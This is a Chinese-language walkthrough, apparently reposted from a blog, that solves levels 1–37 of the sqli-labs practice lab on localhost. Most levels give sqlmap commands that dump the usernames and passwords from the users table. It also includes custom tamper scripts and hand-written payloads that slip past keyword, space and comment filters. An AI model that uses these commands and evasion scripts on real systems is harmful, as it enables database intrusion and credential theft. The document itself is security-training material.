自学内容网 自学内容网

【sqlmap】sqli-labs速通攻略

sqli-labs工具速通

Less-1

sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-1/?id=1 --batch -D security -T users -C username,password --dump

Less-2

sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-2/?id=1 --batch -D security -T users -C username,password --dump

Less-3

sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-3/?id=1 --batch -D security -T users -C username,password --dump

Less-4

sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-4/?id=1 --batch -D security -T users -C username,password --dump

Less-5

sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-5/?id=1 --batch -D security -T users -C username,password --dump

Less-6

sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-6/?id=1 --batch -D security -T users -C username,password --dump

Less-7

sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-7/?id=1 --batch -D security -T users -C username,password --dump

Less-8

sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-8/?id=1 --batch -D security -T users -C username,password --dump

Less-9

sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-9/?id=1 --batch -D security -T users -C username,password --dump

Less-10

sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users -C username,password --dump

如果注不进入就把level提升到5,risk提升到2

sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch --dbs --level=5 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security --tables --level=5 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users --columns --level=5 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-10/?id=1 --batch -D security -T users -C username,password --dump --level=5 --risk=2

Less-11

sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-11/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

Less-12

sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-12/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

Less-13

sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-13/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

Less-14

sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-14/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

Less-15

sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-15/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

Less-16

sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 --dbs
sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-16/ --batch --data="uname=admin&passwd=123&submit=Submit" --level=4 -D security -T users -C username,password --dump

Less-17

sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" --dbs
sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-17/ --batch --data="uname=admin&passwd=123&submit=Submit" -D security -T users -C username,password --dump

注意,因为该接口本身就是会对数据做更新的,因此使用sqlmap注入会导致数据被更新,密码会变为1

Less-18

sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" --dbs --level=3
sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security --tables --level=3
sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users --columns --level=3
sqlmap -u http://127.0.0.1:8081/Less-18/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users -C username,password --dump --level=3

Less-19

sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" --dbs --level=3
sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security --tables --level=3
sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users --columns --level=3
sqlmap -u http://127.0.0.1:8081/Less-19/ --batch --data="uname=admin&passwd=admin&submit=Submit" -D security -T users -C username,password --dump --level=3

Less-20

sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" --dbs --level=2
sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" -D security --tables --level=3
sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" -D security -T users --columns --level=3
sqlmap -u http://127.0.0.1:8081/Less-20/ --batch --cookie="uname=admin" -D security -T users -C username,password --dump --level=3

Less-21

发现cookie是admin=YWRtaW4=,也就是cookie的值进行了base64编码,需要使用–tamper指定base64编码处理

sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 --dbs
sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-21/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users -C username,password --dump

Less-22

类似Less-21

sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 --dbs
sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-22/ --batch --cookie="uname=admin" --tamper=base64encode.py --level=2 -D security -T users -C username,password --dump

Less-23

sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-23/?id=1 --batch -D security -T users -C username,password --dump

Less-24

二次注入,不适用sqlmap

Less-25

需要绕过and or过滤,可以使用双写的方式绕过

sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py --dbs
sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-25/?id=1 --batch --tamper=doubleandor.py -D security -T users -C username,password --dump
"""
doubleandor.py
"""
#!/usr/bin/env python

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

    >>> tamper("1 AND '1'='1")
    "1 %26%26 '1'='1"
    """

    retVal = payload

    if payload:
        retVal = retVal.replace("and","anandd").replace("or","oorr").replace("AND","ANANDD").replace("OR","OORR")

    return retVal

Less-26

本题除了过滤了and or外,空格和#也被过滤。and和or用双写绕过,空格用%a0绕过,#用 and '1闭合语句进行绕过

基本的payload如下

?id=1'%a0anandd%a0extractvalue(1,concat(0x7e,(select%a0database()),0x7e))%a0anandd'1

我们可以使用自定义的脚本替换字符进行绕过,让sqlmap帮我们注入:

sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor --dbs
sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-26/?id=1 --batch --tamper=hash2close,space2a0,doubleandor -D security -T users -C username,password --dump

ps:由于sqlmap生成的payload太长,暴字段和值的时候可能会有问题,暴值的时候可以一个字段一个字段注

  • hash2close.py:将#替换为 and '1进行标签闭合

    #!/usr/bin/env python
    
    import re
    
    from lib.core.enums import PRIORITY
    
    __priority__ = PRIORITY.LOWEST
    
    def dependencies():
        pass
    
    def tamper(payload, **kwargs):
        """
        >>> tamper("1#")
        "1 AND '1'='1"
        """
    
        retVal = payload
        if not payload:
            return payload
        
        retVal = retVal.replace("#"," and '1' = '1")
    
        return retVal
    
  • space2a0.py:将空格替换为%a0

    #!/usr/bin/env python
    
    import re
    
    from lib.core.enums import PRIORITY
    
    __priority__ = PRIORITY.LOWEST
    
    def dependencies():
        pass
    
    def tamper(payload, **kwargs):
        """
        >>> tamper("1 and 1")
        "1%a0and%a01"
        """
    
        retVal = payload
        if not payload:
            return payload
        
        retVal = retVal.replace(" ", "%a0")
    
        return retVal
    
  • doubleandor.py:将and、or进行双写

    #!/usr/bin/env python
    
    import re
    
    from lib.core.enums import PRIORITY
    
    __priority__ = PRIORITY.LOWEST
    
    def dependencies():
        pass
    
    def tamper(payload, **kwargs):
        """
        >>> tamper("1 AND '1'='1")
        "1 ANANDD '1'='1"
        """
    
        retVal = payload
    
        if payload:
            retVal = re.sub(r"(?i)\bAND\b", "ANANDD", re.sub(r"(?i)\bOR\b", "OORR", payload))
    
        return retVal
    

Less-27

由于页面返回自带Hint的原因,sqlmap无法识别并进行处理。

这一题过滤了union和select,使用报错注入

sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect --dbs
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security -T users -C username --dump
sqlmap -u http://127.0.0.1:8081/Less-27/?id=1 --batch --tamper=hash2close,space2a0,tripleselect -D security -T users -C password --dump

hash2close,space2a0见Less-26

tripleselect.py:三写绕过select

#!/usr/bin/env python

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    >>> tamper("select")
    "selselecselecttect"
    """

    retVal = payload
    if not payload:
        return payload
    
    retVal = re.sub(r"(?i)select", "selselecselecttect", retVal)

    return retVal

Less-28

在这里插入图片描述

在这里插入图片描述

  • 因为注释符号--#被过滤了,因此需要使用语句闭合末尾处。由于整个查询在括号内,因此闭合时需要注意加上括号,在末尾使用and ('1闭合。或者使用;%00也可以,其中%00是截断符号
  • union select被过滤了,可以使用unionunion select select或者使用union all select,sqlmap自带了union all select,因此不需要设置
  • 空格可以使用%0a或者%a0替换
?id=9999')%0aunionunion%0aselect%0aselect%0a1,database(),version();%00

?id=9999')%0aunionunion%0aselect%0aselect%0a1,group_concat(0x7e,%0atable_name,%0a0x7e),3%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database();%00

?id=9999')%0aunionunion%0aselect%0aselect%0a1,group_concat(0x7e,%0acolumn_name,%0a0x7e),3%0afrom%0ainformation_schema.columns%0awhere%0atable_schema=database()%0aand%0atable_name='users';%00

?id=9999')%0aunionunion%0aselect%0aselect%0a1,group_concat(username),group_concat(password)%0afrom%0ausers;%00

sqlmap:

sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2 --dbs
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2  -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2  -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2  -D security -T users -C username --dump
sqlmap -u http://127.0.0.1:8081/Less-28/?id=1 --batch --tamper=comment2truncate,space2a0 --risk=2  -D security -T users -C password --dump
"""
comment2truncate.py
"""
#!/usr/bin/env python

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    >>> tamper("1#")
    "1;%00"
    >>> tamper("1--")
    "1;%00"
    """

    retVal = payload
    if not payload:
        return payload
    
    retVal = retVal.replace("#",";%00").replace("--",";%00")


    return retVal

space2a0见Less-26

ps:爆表字段可能存在使用工具会爆破失败的情况

Less-29

使用WAF进行了过滤,直接运行程序即可

sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch -D security -T users -C username,password --dump

Less-30

使用WAF进行了过滤,直接运行程序即可

sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch --dbs --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch -D security --tables --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch -D security -T users --columns --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-30/?id=1 --batch -D security -T users -C username,password --dump --level=2 --risk=2

Less-31

使用WAF进行了过滤,直接运行程序即可

sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch --dbs --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch -D security --tables --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch -D security -T users --columns --level=2 --risk=2
sqlmap -u http://127.0.0.1:8081/Less-31/?id=1 --batch -D security -T users -C username,password --dump --level=2 --risk=2

Less-32

宽字节注入

sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-32/?id=1 --batch --tamper=unmagicquotes -D security -T users -C username,password --dump

Less-33

宽字节注入

sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-33/?id=1 --batch --tamper=unmagicquotes -D security -T users -C username,password --dump

Less-34

宽字节注入,只不过换成了POST方法

sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-34/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users -C username,password --dump

Less-35

使用了addSlashes()函数转义,正常会想到宽字节,但是此题是数字型,非引号类型注入,因此直接注就行

sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch --dbs
sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch  -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-35/?id=1 --batch  -D security -T users -C username,password --dump

Less-36

转义的字符更多了,但宽字符注入仍有效

sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-36/?id=1 --batch --tamper=unmagicquotes -D security -T users -C username,password --dump

Less-37

类似Less-36,换成了POST方法

sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes --dbs
sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security --tables
sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users --columns
sqlmap -u http://127.0.0.1:8081/Less-37/ --data="uname=admin&passwd=123&submit=Submit" --batch --tamper=unmagicquotes -D security -T users -C username,password --dump

原文地址:https://blog.csdn.net/weixin_47383889/article/details/142748015

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!